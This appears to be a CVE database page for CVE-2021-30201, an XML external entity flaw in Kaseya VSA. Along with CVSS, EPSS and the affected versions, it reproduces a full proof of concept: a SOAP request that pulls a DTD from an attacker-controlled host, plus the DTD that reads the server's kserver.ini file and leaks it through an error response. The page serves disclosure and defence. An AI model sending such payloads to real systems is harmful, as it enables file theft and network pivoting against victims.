CVE-2021-30201 Vulnerability Analysis & Exploit Details

CVE-2021-30201
Vulnerability Scoring

7.5
/10
Very High Risk

Highly exploitable, CVE-2021-30201 poses a critical security risk that could lead to severe breaches.

Attack Complexity Details

  • Attack Complexity: Low
    Exploits can be performed without significant complexity or special conditions.
  • Attack Vector: Network
    Vulnerability is exploitable over a network without physical access.
  • Privileges Required: None
    No privileges are required for exploitation.
  • Scope: Unchanged
    Exploit remains within the originally vulnerable component.
  • User Interaction: None
    No user interaction is necessary for exploitation.

CVE-2021-30201 Details

Status: Modified

Last updated: 🕕 21 Nov 2024, 06:03 UTC
Originally published on: 🕑 09 Jul 2021, 14:15 UTC

Time between publication and last update: 1230 days

CVSS Release: version 3

CVSS3 Source

cve@mitre.org

CVSS3 Type

Secondary

CVSS3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2021-30201 Vulnerability Summary

CVE-2021-30201: The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.

Assessing the Risk of CVE-2021-30201

Access Complexity Graph

The exploitability of CVE-2021-30201 depends on two key factors: attack complexity (the level of effort required to execute an exploit) and privileges required (the access level an attacker needs).

Exploitability Analysis for CVE-2021-30201

With low attack complexity and no required privileges, CVE-2021-30201 is an easy target for cybercriminals. Organizations should prioritize immediate mitigation measures to prevent unauthorized access and data breaches.

Understanding AC and PR

A lower complexity and fewer privilege requirements make exploitation easier. Security teams should evaluate these aspects to determine the urgency of mitigation strategies, such as patch management and access control policies.

Attack Complexity (AC) measures the difficulty in executing an exploit. A high AC means that specific conditions must be met, making an attack more challenging, while a low AC means the vulnerability can be exploited with minimal effort.

Privileges Required (PR) determine the level of system access necessary for an attack. Vulnerabilities requiring no privileges are more accessible to attackers, whereas high privilege requirements limit exploitation to authorized users with elevated access.

CVSS Score Breakdown Chart

Above is the CVSS Sub-score Breakdown for CVE-2021-30201, illustrating how Base, Impact, and Exploitability factors combine to form the overall severity rating. A higher sub-score typically indicates a more severe or easier-to-exploit vulnerability.

CIA Impact Analysis

Below is the Impact Analysis for CVE-2021-30201, showing how Confidentiality, Integrity, and Availability might be affected if the vulnerability is exploited. Higher values usually signal greater potential damage.

  • Confidentiality: High
    Exploiting CVE-2021-30201 can result in unauthorized access to sensitive data, severely compromising data privacy.
  • Integrity: None
    CVE-2021-30201 poses no threat to data integrity.
  • Availability: None
    CVE-2021-30201 does not impact system availability.

Exploit Prediction Scoring System (EPSS)

The EPSS score estimates the probability that this vulnerability will be exploited in the near future.

EPSS Score: 0.282% (probability of exploit)

EPSS Percentile: 68.85% (lower percentile = lower relative risk)
This vulnerability is less risky than approximately 31.150000000000006% of others.

CVE-2021-30201 References

External References

CWE Common Weakness Enumeration

CWE-611

CAPEC Common Attack Pattern Enumeration and Classification

  • Data Serialization External Entities Blowup CAPEC-221 This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.

Vulnerable Configurations

  • cpe:2.3:a:kaseya:vsa:-:*:*:*:-:*:*:*
    cpe:2.3:a:kaseya:vsa:-:*:*:*:-:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.1.0.10:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.1.0.10:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.1.0.11:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.1.0.11:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.8:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.8:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.9:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.9:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.10:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.10:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.11:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.11:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.12:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.12:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.14:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.14:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.15:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.15:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.16:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.16:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.17:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.17:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.18:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.18:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.19:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.19:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.20:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.20:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.21:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.21:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.22:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.22:*:*:*:rmm:*:*:*
  • cpe:2.3:a:kaseya:vsa:9.5.0.23:*:*:*:rmm:*:*:*
    cpe:2.3:a:kaseya:vsa:9.5.0.23:*:*:*:rmm:*:*:*

Protect Your Infrastructure against CVE-2021-30201: Combat Critical CVE Threats

Stay updated with real-time CVE vulnerabilities and take action to secure your systems. Enhance your cybersecurity posture with the latest threat intelligence and mitigation techniques. Develop the skills necessary to defend against CVEs and secure critical infrastructures. Join the top cybersecurity professionals safeguarding today's infrastructures.

Other 5 Recently Published CVEs Vulnerabilities

  • CVE-2025-3809 – The Debug Log Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the auto-refresh debug log in all versions up to, and i...
  • CVE-2025-2111 – The Insert Headers And Footers plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.1. This i...
  • CVE-2024-13926 – The WP-Syntax WordPress plugin through 1.2 does not properly handle input, allowing an attacker to create a post containing a large number of tags,...
  • CVE-2025-3103 – The CLEVER - HTML5 Radio Player With History - Shoutcast and Icecast - Elementor Widget Addon plugin for WordPress is vulnerable to arbitrary file ...
  • CVE-2025-3275 – The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the TF E Slider widget in all versions up...